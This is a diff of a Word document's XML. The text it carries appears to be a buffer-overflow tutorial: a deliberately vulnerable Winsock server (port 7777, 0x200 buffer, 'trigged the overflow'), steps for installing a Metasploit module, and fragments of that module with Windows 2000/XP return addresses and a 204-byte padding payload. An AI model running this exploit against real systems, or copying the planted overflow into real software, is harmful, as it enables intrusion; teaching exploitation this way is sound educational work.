-        <w:t xml:space="preserve">char </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>[0x200]; //noticed it is 0x200</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">WSADATA </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wsa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>WSAStartup</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(MAKEWORD(1,1),&amp;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wsa</w:t>
+        <w:t>receive_len</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -412,133 +1213,16 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t>if((sock=socket(AF_INET,SOCK_STREAM,0))&lt;0)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cout</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&lt;&lt;sock&lt;&lt;"socket creating error!"&lt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>endl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>exit(1);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sock_server.sin_family</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=AF_INET;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sock_server.sin_port</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>htons</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(7777);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sock_server.sin_addr.s_addr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>htonl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(INADDR_ANY);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>if(bind(sock,(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>struct</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sockaddr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>*)&amp;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sock_server,sizeof</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>closesocket</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -546,596 +1230,42 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>sock_server</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)))</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cout</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&lt;&lt;"binging stream socket error!"&lt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>endl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cout</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&lt;&lt;"**************************************"&lt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>endl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cout</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&lt;&lt;"     exploit target server 1.0</w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">   "&lt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>endl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cout</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&lt;&lt;"**************************************"&lt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>endl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>listen(sock,4);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lenth</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sizeof</w:t>
+        <w:t>msgsock</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>}while</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(1);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>WSACleanup</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>struct</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sockaddr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>do{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>msgsock</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=accept(sock,(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>struct</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sockaddr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>*)&amp;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sock_client</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>,(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>int</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>*)&amp;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lenth</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>if(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>msgsock</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>==-1)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cout</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&lt;&lt;"accept error!"&lt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>endl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>break;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">else </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>do</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>memset</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(buf,0,sizeof(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>));</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>if((</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>receive_len</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>recv</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>msgsock,buf,sizeof</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>),0))&lt;0)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cout</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">&lt;&lt;"reading stream message </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>erro</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>!"&lt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>endl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>receive_len</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">=0; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>msg_display</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>buf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>);//trigged the overflow</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>}while(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>receive_len</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>closesocket</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>msgsock</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>}while(1);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>WSACleanup</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>();</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1357,9 +1487,14 @@
       <w:r>
         <w:tab/>
       </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">  of MSF 3.0. For example, the default directory of exploit is </w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">  of</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> MSF 3.0. For example, the default directory of exploit is </w:t>
       </w:r>
       <w:r>
         <w:cr/>
@@ -1372,9 +1507,14 @@
       <w:r>
         <w:tab/>
       </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">  "C:\Program Files\</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">  "</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>C:\Program Files\</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1395,9 +1535,14 @@
       <w:r>
         <w:tab/>
       </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">  this module should be put into</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">  this</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> module should be put into</w:t>
       </w:r>
       <w:r>
         <w:cr/>
@@ -1410,9 +1555,14 @@
       <w:r>
         <w:tab/>
       </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">  "C:\Program Files\Metasploit\Framework3\framework\modules\exploits\failwest\"</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">  "</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>C:\Program Files\Metasploit\Framework3\framework\modules\exploits\failwest\"</w:t>
       </w:r>
       <w:r>
         <w:cr/>
@@ -1505,12 +1655,17 @@
         <w:t xml:space="preserve">class Metasploit3 &lt; </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>Msf</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>::Exploit::Remote</w:t>
+        <w:t>::</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>Exploit::Remote</w:t>
       </w:r>
       <w:r>
         <w:cr/>
@@ -1521,12 +1676,17 @@
         <w:t xml:space="preserve">include </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>Msf</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>::Exploit::Remote::</w:t>
+        <w:t>::</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>Exploit::Remote::</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1555,7 +1715,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> initialize(info = {})</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>initialize(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>info = {})</w:t>
       </w:r>
       <w:r>
         <w:cr/>
@@ -1564,9 +1732,14 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">    super(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>super(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>update_info</w:t>
       </w:r>
@@ -1627,7 +1800,15 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>'Author'         =&gt; [ 'MC' ],</w:t>
+        <w:t>'Author'         =&gt; [ 'MC</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>' ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>,</w:t>
       </w:r>
       <w:r>
         <w:cr/>
@@ -1676,7 +1857,15 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">['Windows 2000',  {'Ret' =&gt; 0x77F8948B } ], </w:t>
+        <w:t>['Windows 2000</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>',  {</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">'Ret' =&gt; 0x77F8948B } ], </w:t>
       </w:r>
       <w:r>
         <w:cr/>
@@ -1697,7 +1886,15 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>['Windows XP SP3',{'Ret' =&gt; 0x77E1F2C8 } ]</w:t>
+        <w:t>['Windows XP SP3</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>',{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>'Ret' =&gt; 0x77E1F2C8 } ]</w:t>
       </w:r>
       <w:r>
         <w:cr/>
@@ -1868,7 +2065,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> = 'a'*204 + [target['Ret']].pack('V') + </w:t>
+        <w:t xml:space="preserve"> = 'a'*204 + [target['Ret']</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>].pack</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">('V') + </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1936,7 +2141,14 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">end  #end of exploit </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>end  #</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">end of exploit </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2013,11 +2225,19 @@
     <w:p>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>root@kali</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">:~# </w:t>
+        <w:t>root@</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>kali</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>:~</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"># </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2033,14 +2253,29 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">     .~+P``````-o+:.                                      -o+:.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
+        <w:t xml:space="preserve">     </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>.~</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>+P``````-o+:.                                      -o</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>+:.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>.+</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>oooyysyyssyyssyddh</w:t>
       </w:r>
@@ -2059,7 +2294,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>+++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o</w:t>
+        <w:t>+++++++++++++++++++++++sydhyoyso/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>:.`</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>```...`...-///::+ohhyosyyosyy/+om++:ooo///o</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2086,13 +2329,18 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">                                .</w:t>
+        <w:t xml:space="preserve">                                </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>hmMMMMMMMMMMNddds</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>\...//M\\.../</w:t>
       </w:r>
@@ -2104,7 +2352,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">                                 :Nm-/NMMMMMMMMMMMMM$$</w:t>
+        <w:t xml:space="preserve">                                 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>:Nm</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>-/NMMMMMMMMMMMMM$$</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2158,8 +2414,13 @@
         <w:t>Nd</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>`  :MMMMMMMMMMM$$MMMMMN&amp;&amp;</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>`  :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>MMMMMMMMMMM$$MMMMMN&amp;&amp;</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2179,6 +2440,7 @@
         <w:t>Nh</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>` .</w:t>
       </w:r>
@@ -2187,6 +2449,7 @@
